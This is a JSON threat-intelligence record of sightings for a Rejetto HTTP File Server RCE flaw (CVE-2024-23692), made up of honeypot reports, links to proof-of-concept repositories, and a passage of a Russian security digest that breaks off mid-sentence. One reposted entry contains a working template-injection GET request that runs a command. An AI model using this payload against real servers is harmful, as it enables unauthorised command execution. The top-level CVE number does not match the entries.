{"vulnerability": "CVE-2024-2369", "sightings": [{"uuid": "6db15b7f-245a-4955-a2c5-9b48ef8358c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "seen", "source": "MISP/7ebc96f3-8d60-4f89-a23c-0819a2e1d8c0", "content": "", "creation_timestamp": "2024-07-05T10:20:49.000000Z"}, {"uuid": "3806e1b5-356e-42c4-8ff3-8ef8a4d55f1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2024-07-10T00:10:02.000000Z"}, {"uuid": "fbd758c2-0271-4168-94d9-d89bfbf3a233", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:46.000000Z"}, {"uuid": "f2698411-aa69-45f3-ab47-43ee33eee1e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-09)", "content": "", "creation_timestamp": "2025-01-09T00:00:00.000000Z"}, {"uuid": "f4e75c12-baea-4ac0-bcdc-d4d9a670a9f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-03)", "content": "", "creation_timestamp": "2024-12-03T00:00:00.000000Z"}, {"uuid": "e3eda888-690b-4fae-9ee8-3938ee161ab7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23690", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lhedy3u25j2c", "content": "", "creation_timestamp": "2025-02-04T15:15:53.987578Z"}, {"uuid": "e5107821-4ebb-4b94-adae-e606adf81a63", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-01-28)", "content": "", "creation_timestamp": "2025-01-28T00:00:00.000000Z"}, {"uuid": "de54b69d-f92e-46b6-9d20-3f3dcf57068a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:11:00.000000Z"}, {"uuid": "04badeff-d270-4220-8a7e-7cb4ac67bee5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-15)", "content": "", "creation_timestamp": "2025-02-15T00:00:00.000000Z"}, {"uuid": "404e87ba-029d-40f5-b0a6-10d8bc4419db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-14)", "content": "", "creation_timestamp": "2025-03-14T00:00:00.000000Z"}, {"uuid": "58cad4a6-5b22-460d-8cc2-af271c01338c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-14)", "content": "", "creation_timestamp": "2025-03-14T00:00:00.000000Z"}, {"uuid": "fa0ca4a4-e846-4dbf-95e7-bbfc9d5dfa8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:55.000000Z"}, {"uuid": "cb029264-d7d6-40e5-be94-27ecad424237", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "seen", "source": "https://bsky.app/profile/nimblenerd.social/post/3llhddmtcb72s", "content": "", "creation_timestamp": "2025-03-28T17:23:14.619646Z"}, {"uuid": "c578e877-818a-4a19-b5d3-0d8175684054", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-15)", "content": "", "creation_timestamp": "2025-03-15T00:00:00.000000Z"}, {"uuid": "a7c51526-2519-4062-9d1c-ab38fa17e037", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3llk7zvave72s", "content": "", "creation_timestamp": "2025-03-29T21:02:04.996974Z"}, {"uuid": "798b13b3-3c79-4aed-91a9-4da801fdd96e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-26)", "content": "", "creation_timestamp": "2025-06-26T00:00:00.000000Z"}, {"uuid": "2e0f31ca-8bbc-426a-a5bf-30096d62743b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-04-24)", "content": "", "creation_timestamp": "2025-04-24T00:00:00.000000Z"}, {"uuid": "e89a6760-9c39-4590-9b6b-f6d054a1ff73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-17)", "content": "", "creation_timestamp": "2025-05-17T00:00:00.000000Z"}, {"uuid": "494add63-353c-4f5d-ac29-bf49d80f2b36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-10)", "content": "", "creation_timestamp": "2025-06-10T00:00:00.000000Z"}, {"uuid": "d2bd137e-6b4c-45ad-a47d-491036ba3591", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-20)", "content": "", "creation_timestamp": "2025-06-20T00:00:00.000000Z"}, {"uuid": "b91c1394-013d-4163-9f79-1e25fe13ed97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/rejetto_hfs_rce_cve_2024_23692.rb", "content": "", "creation_timestamp": "2024-06-11T17:39:00.000000Z"}, {"uuid": "9ef14d14-2419-46d5-9db5-a8b62825feff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "seen", "source": "MISP/a9d21043-f825-4bac-8d2b-56fb9e8343e7", "content": "", "creation_timestamp": "2025-10-23T21:13:02.000000Z"}, {"uuid": "5735023c-dac0-4d0b-974b-1d74a2f1a665", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-04)", "content": "", "creation_timestamp": "2025-08-04T00:00:00.000000Z"}, {"uuid": "7adc945d-88c9-4b9c-bd39-cff4e9d4e18b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7684", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-23692\nURL\uff1ahttps://github.com/BBD-YZZ/CVE-2024-23692\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-17T09:24:29.000000Z"}, {"uuid": "8de2e410-9447-4a45-ba37-c13dab35c4ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "seen", "source": "MISP/d17bd6ef-d68b-317b-ac33-cdbc44c5fc57", "content": "", "creation_timestamp": "2025-08-31T03:13:15.000000Z"}, {"uuid": "57e9813e-0282-48c5-8583-33a6d9859e44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2024-23692", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/06724f64-88ab-4a83-a881-cf87bd7d3487", "content": "", "creation_timestamp": "2026-02-02T12:26:33.980839Z"}, {"uuid": "975d9968-2148-4a1c-b6cb-875bc58ccfcb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7672", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-23692 exp\nURL\uff1ahttps://github.com/Tupler/CVE-2024-23692-exp\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-16T07:07:59.000000Z"}, {"uuid": "1da55498-3287-4d4d-9148-d517b7bbb55d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7636", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aUnauthenticated RCE Flaw in Rejetto HTTP File Server (CVE-2024-23692)\nURL\uff1ahttps://github.com/jakabakos/CVE-2024-23692-RCE-in-Rejetto-HFS\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-13T06:09:54.000000Z"}, {"uuid": "18d534f8-e78e-4dd1-89df-49e0d9e27bc6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7930", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aRejetto HTTP File Server (HFS) 2.x - Unauthenticated RCE exploit module (CVE-2024-23692)\nURL\uff1ahttps://github.com/pradeepboo/Rejetto-HFS-2.x-RCE-CVE-2024-23692-\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-10T04:47:15.000000Z"}, {"uuid": "97adf1c0-1c38-4dc9-91a2-0bcb4b27666c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9146", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-23692 \u662f\u5f71\u54cd Rejetto HTTP File Server\uff08HFS\uff092.3m \u53ca\u4e4b\u524d\u7248\u672c\u7684\u6a21\u677f\u6ce8\u5165\u6f0f\u6d1e\u3002\u8be5\u6f0f\u6d1e\u5141\u8bb8\u8fdc\u7a0b\u672a\u6388\u6743\u7684\u653b\u51fb\u8005\u901a\u8fc7\u53d1\u9001\u7279\u5236\u7684 HTTP \u8bf7\u6c42\uff0c\u5728\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u4e0a\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002\nURL\uff1ahttps://github.com/XiaomingX/CVE-2024-23692-poc\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-11-23T04:02:27.000000Z"}, {"uuid": "1a6bad11-e2f3-4270-873d-6cd52fe2bf15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9158", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1a\u547d\u4ee4\u6ce8\u5165\n\u63cf\u8ff0\uff1aCVE-2024-23692 \u662f\u5f71\u54cd Rejetto HTTP File Server\uff08HFS\uff092.3m \u53ca\u4e4b\u524d\u7248\u672c\u7684\u6a21\u677f\u6ce8\u5165\u6f0f\u6d1e\u3002\u8be5\u6f0f\u6d1e\u5141\u8bb8\u8fdc\u7a0b\u672a\u6388\u6743\u7684\u653b\u51fb\u8005\u901a\u8fc7\u53d1\u9001\u7279\u5236\u7684 HTTP \u8bf7\u6c42\uff0c\u5728\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u4e0a\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002\nURL\uff1ahttps://github.com/XiaomingX/cve-2024-23692-poc\n\n\u6807\u7b7e\uff1a#\u547d\u4ee4\u6ce8\u5165", "creation_timestamp": "2024-11-24T06:35:30.000000Z"}, {"uuid": "621f4439-ee70-4da0-bf25-a8f920334402", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7694", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-23692 Exploit\nURL\uff1ahttps://github.com/0x20c/CVE-2024-23692-EXP\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-18T03:32:27.000000Z"}, {"uuid": "00a31d2e-199d-4e54-aeef-dcf93166b541", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/17212", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aHFS 2.3m SERVER RCE Vulnerability exploit\nURL\uff1ahttps://github.com/999gawkboyy/CVE-2024-23692_Exploit\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-03-06T10:14:40.000000Z"}, {"uuid": "41cde970-85dc-4487-be39-90ebf6e689f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9541", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aHFS2.3\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c(CVE-2024-23692)\nURL\uff1ahttps://github.com/NingXin2002/HFS2.3_poc\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-12-21T07:18:08.000000Z"}, {"uuid": "3dad5d9a-7bbc-45f4-ac13-7ee5a67be8cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8535", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPOC - Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692 \nURL\uff1ahttps://github.com/verylazytech/CVE-2024-23692\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-09-15T12:17:31.000000Z"}, {"uuid": "6599b4f5-d8bd-44f0-8c8e-857c1e03f3a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/16015", "content": "cve-2024-23692\n\nGET /?n=%0A&cmd=netstat&search=%25xxx%25url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1\n\nnetstat\n\n#exploit #poc", "creation_timestamp": "2024-08-05T18:12:38.000000Z"}, {"uuid": "86db5717-7351-4eab-8eff-1922b630120f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "seen", "source": "https://t.me/kasperskyb2b/1330", "content": "\u23e9 \u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f APT \u0438 \u043d\u043e\u0432\u043e\u0441\u0442\u0438 \u0418\u0411 \u0437\u0430 \u043d\u0435\u0434\u0435\u043b\u044e\n\n\ud83e\udd28 \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 OpenSSH:  \u0445\u0430\u0439\u043f, \u0437\u0434\u0440\u0430\u0432\u044b\u0439 \u0441\u043c\u044b\u0441\u043b, \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u0442\u044c \u0418\u0411-\u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439.\n\n\ud83e\udd73 \u0415\u0432\u0440\u043e\u043f\u043e\u043b \u0441\u043e\u0432\u043c\u0435\u0441\u0442\u043d\u043e \u0441 \u043f\u0430\u0440\u0442\u043d\u0451\u0440\u0430\u043c\u0438 \u043d\u0430\u043a\u0440\u044b\u043b \u0441\u0435\u0442\u044c \u0438\u0437 600 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u044e\u0449\u0438\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 Cobalt Strike, \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u0432\u0448\u0438\u0445\u0441\u044f \u0432 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0430\u0445.  \u041f\u043e\u0441\u043b\u0435 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438 \u0447\u0438\u0441\u043b\u043e \u0430\u043a\u0442\u0438\u0432\u043d\u044b\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432 \u0432 \u0441\u0435\u0442\u0438 \u0441\u043d\u0438\u0437\u0438\u043b\u043e\u0441\u044c \u043d\u0430 \u0447\u0435\u0442\u0432\u0435\u0440\u0442\u044c. \n\n\ud83d\udcac \u0420\u0430\u0441\u043a\u0440\u044b\u0442\u0430 \u043c\u0430\u0441\u0448\u0442\u0430\u0431\u043d\u0430\u044f \u0433\u0440\u0443\u043f\u043f\u0430 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0439 \u0446\u0435\u043b\u0435\u0432\u043e\u0433\u043e \u0444\u0438\u0448\u0438\u043d\u0433\u0430, \u043e\u0440\u0438\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u043d\u0430 \u0440\u0443\u043a\u043e\u0432\u043e\u0434\u0441\u0442\u0432\u043e \u043a\u0440\u0443\u043f\u043d\u044b\u0445 \u0444\u0438\u0440\u043c, \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u043e\u0432 \u0433\u043e\u0441\u0443\u0447\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0439 \u0438 \u043c\u0435\u0434\u0438\u0446\u0438\u043d\u0441\u043a\u0438\u0445 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439. \u0422\u0440\u0438 \u0440\u0430\u0437\u043d\u044b\u0435 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043a\u0430\u0436\u0434\u0430\u044f \u0441\u0432\u043e\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0439, \u043d\u043e \u043e\u0431\u0449\u0435\u0439 \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u043d\u043e\u0439 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u044c\u044e \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0440\u0430\u0437\u0432\u0438\u0442\u044b\u0435 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b \u043e\u0431\u0445\u043e\u0434\u0430 MFA, \u043e\u043f\u0442\u0438\u043c\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u043f\u043e\u0434 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443 \u0436\u0435\u0440\u0442\u0432\u044b.\n\n\ud83c\udd94 \u041a\u0441\u0442\u0430\u0442\u0438 \u043e \u0444\u0438\u0448\u0438\u043d\u0433\u0435: \u0434\u0435\u0442\u0430\u043b\u044c\u043d\u044b\u0439 \u0440\u0430\u0437\u0431\u043e\u0440 \u043a\u0440\u0438\u043c\u0438\u043d\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b, \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u0435\u043c\u043e\u0439 \u0432 \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u0445 \u0441\u0445\u0435\u043c\u0430\u0445 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0445 \u0430\u0442\u0430\u043a.\n\n\ud83d\udc6e\u200d\u2640\ufe0f \u0412 \u041b\u0430\u0442\u0438\u043d\u0441\u043a\u043e\u0439 \u0410\u043c\u0435\u0440\u0438\u043a\u0435 \u0430\u043a\u0442\u0438\u0432\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043b\u0441\u044f \u0431\u0430\u043d\u043a\u043e\u0432\u0441\u043a\u0438\u0439 \u0442\u0440\u043e\u044f\u043d\u0435\u0446 Mekotio. \u0412\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u044d\u0442\u043e \u0441\u0432\u044f\u0437\u0430\u043d\u043e \u0441 \u043d\u0435\u0434\u0430\u0432\u043d\u0435\u0439 \u043f\u043e\u043b\u0438\u0446\u0435\u0439\u0441\u043a\u043e\u0439 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0435\u0439 \u043f\u043e \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044e \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b Grandoreiro, \u0434\u0440\u0443\u0433\u043e\u0433\u043e \u0442\u0440\u043e\u044f\u043d\u0446\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e \u043e\u0446\u0435\u043d\u043a\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0438\u043c\u0435\u0435\u0442 \u043e\u0431\u0449\u0438\u0435 \u043a\u043e\u0440\u043d\u0438 \u0441 Mekotio. \n\n\ud83d\ude80 \u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 Linux-\u0432\u0435\u0440\u0441\u0438\u044f \u0442\u0440\u043e\u044f\u043d\u0446\u0430 TgRat, \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u043c\u043e\u0433\u043e \u0447\u0435\u0440\u0435\u0437 Telegram.\n\n\ud83c\udf1a \u0414\u0435\u0442\u0430\u043b\u044c\u043d\u044b\u0439 \u0440\u0430\u0437\u0431\u043e\u0440 RaaS Eldorado. \u041f\u043e \u043e\u0446\u0435\u043d\u043a\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 \u043d\u0435\u0432\u0435\u043b\u0438\u043a\u0430, \u0438\u043c\u0435\u0435\u0442 \u0412\u041f\u041e \u0434\u043b\u044f Linux \u0438 Windows, \u043d\u0435 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043f\u043e \u0441\u0442\u0440\u0430\u043d\u0430\u043c \u0421\u041d\u0413.\n\n\ud83d\udda8 \u0412 \u043e\u0442\u043b\u0438\u0447\u0438\u0435 \u043e\u0442 OpenSSH, \u0434\u044b\u0440\u0430 \u0432 Ghostscript \u043d\u0435 \u043d\u0430\u0434\u0435\u043b\u0430\u043b\u0430 \u043e\u0441\u043e\u0431\u043e\u0433\u043e \u0448\u0443\u043c\u0430 \u0432 \u043d\u043e\u0432\u043e\u0441\u0442\u044f\u0445, \u0438 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e \u0437\u0440\u044f. CVE-2024-29510 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u043c\u0443 \u043a\u043e\u0434\u0443 \u0432 PDF \u043f\u043e\u043a\u0438\u043d\u0443\u0442\u044c \u043f\u0435\u0441\u043e\u0447\u043d\u0438\u0446\u0443 \u0438 \u043e\u0442\u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u043d\u0430 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0435. \u0423\u0447\u0438\u0442\u044b\u0432\u0430\u044f, \u0447\u0442\u043e \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0441\u043e\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0445 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 \u0438 \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0442 Ghostscript \u0432 